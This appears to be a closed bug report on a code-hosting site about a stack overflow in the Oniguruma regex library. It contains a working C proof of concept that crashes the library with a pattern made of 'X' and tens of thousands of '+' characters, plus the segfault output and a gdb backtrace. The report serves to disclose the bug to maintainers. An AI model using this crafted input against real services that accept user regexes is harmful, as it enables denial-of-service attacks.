Closed
Description
If Oniguruma tries to parse a very deeply nested regex, the deep recursive calls in functions such as optimize_nodes() and tree_min_len() overflow the stack.
Here is proof-of-concept (PoC) source code that simply calls onig_search() with a very long regular expression, "X+++++++++++++++++++++++++++++++ .... ".
/*
* oniguruma_stack.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "oniguruma.h"
/*
 * Compile `apattern` with the given syntax (ASCII encoding, default
 * options) and search `astr` for it, reporting the outcome on stderr.
 *
 * syntax   - Oniguruma syntax handed to onig_new().
 * apattern - NUL-terminated pattern; its length is taken with strlen().
 * astr     - NUL-terminated subject string; its length is taken with strlen().
 *
 * Returns 0 when the search ran to completion (match or ONIG_MISMATCH),
 * and -1 when compilation, region allocation, or the search itself failed.
 */
extern int exec(OnigSyntaxType* syntax, char* apattern, char* astr)
{
  int r;
  int ret = 0;
  unsigned char *start, *range, *end;
  regex_t* reg;
  OnigErrorInfo einfo;
  OnigRegion *region;
  UChar* pattern = (UChar* )apattern;
  UChar* str = (UChar* )astr;

  /* onig_new() stores the compiled regex through its first argument. */
  r = onig_new(&reg, pattern, pattern + strlen((char* )pattern),
               ONIG_OPTION_DEFAULT, ONIG_ENCODING_ASCII, syntax, &einfo);
  if (r != ONIG_NORMAL) {
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r, &einfo);
    fprintf(stderr, "ERROR: %s\n", s);
    return -1;
  }

  region = onig_region_new();
  if (region == NULL) {
    /* region is dereferenced below, so bail out before searching. */
    fprintf(stderr, "ERROR: onig_region_new failed\n");
    onig_free(reg);
    return -1;
  }

  /* Search the whole subject string, from its first byte to its end. */
  end = str + strlen((char* )str);
  start = str;
  range = end;
  r = onig_search(reg, str, end, start, range, region, ONIG_OPTION_NONE);
  if (r >= 0) {
    int i;
    fprintf(stderr, "match at %d\n", r);
    for (i = 0; i < region->num_regs; i++) {
      fprintf(stderr, "%d: (%d-%d)\n", i, region->beg[i], region->end[i]);
    }
  }
  else if (r == ONIG_MISMATCH) {
    fprintf(stderr, "search fail\n");
  }
  else { /* error */
    char s[ONIG_MAX_ERROR_MESSAGE_LEN];
    onig_error_code_to_str((UChar* )s, r);
    fprintf(stderr, "ERROR: %s\n", s);
    ret = -1;
  }

  /* Single cleanup path shared by the match, mismatch and error cases. */
  onig_region_free(region, 1 /* 1:free self, 0:free contents only */);
  onig_free(reg);
  return ret;
}
/* Size in bytes of the pattern buffer, including its terminating NUL. */
#define REGEX_SZ 0x10000
/*
 * Build the pattern "X" followed by a long run of '+' and pass it to
 * exec() with the Ruby syntax and the subject string "bgc".
 *
 * Returns the value returned by exec().
 */
extern int main(int argc, char* argv[])
{
  int r, i;
  OnigEncoding use_encs[] = { ONIG_ENCODING_ASCII };
  char regex[REGEX_SZ] = {0};

  regex[0] = 'X';
  /* Stop one byte short of the end so the last element stays '\0';
     exec() measures the pattern with strlen(). */
  for (i = 1; i < REGEX_SZ - 1; i++) regex[i] = '+';

  onig_initialize(use_encs, sizeof(use_encs)/sizeof(use_encs[0]));
  r = exec(ONIG_SYNTAX_RUBY, regex, "bgc");
  onig_end();
  return r;
}
gcc -g -o oniguruma_stack oniguruma_stack.c -lonig
./oniguruma_stack
Segmentation fault (core dumped)
gdb -q ./oniguruma_stack -c core
Reading symbols from ./oniguruma_stack...done.
[New LWP 19257]
Core was generated by `./oniguruma_stack'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x00007fe64f65fde5 in tree_min_len (
node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,
env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)
at regcomp.c:2839
2839 {
(gdb) bt
#0 0x00007fe64f65fde5 in tree_min_len (
node=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe8>,
env=<error reading variable: Cannot access memory at address 0x7ffcc7ec9fe0>)
at regcomp.c:2839
#1 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a570, env=0x7ffcc86b7470)
at regcomp.c:2942
#2 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a5b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#3 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a5f0, env=0x7ffcc86b7470)
at regcomp.c:2942
#4 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a630, env=0x7ffcc86b7470)
at regcomp.c:2913
#5 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a670, env=0x7ffcc86b7470)
at regcomp.c:2942
#6 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a6b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#7 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a6f0, env=0x7ffcc86b7470)
at regcomp.c:2942
#8 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a730, env=0x7ffcc86b7470)
at regcomp.c:2913
#9 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a770, env=0x7ffcc86b7470)
at regcomp.c:2942
#10 0x00007fe64f66009b in tree_min_len (node=0x55b2d734a7b0, env=0x7ffcc86b7470)
at regcomp.c:2913
#11 0x00007fe64f660196 in tree_min_len (node=0x55b2d734a7f0, env=0x7ffcc86b7470)
at regcomp.c
....
Metadata
Metadata
Assignees
Labels
No labels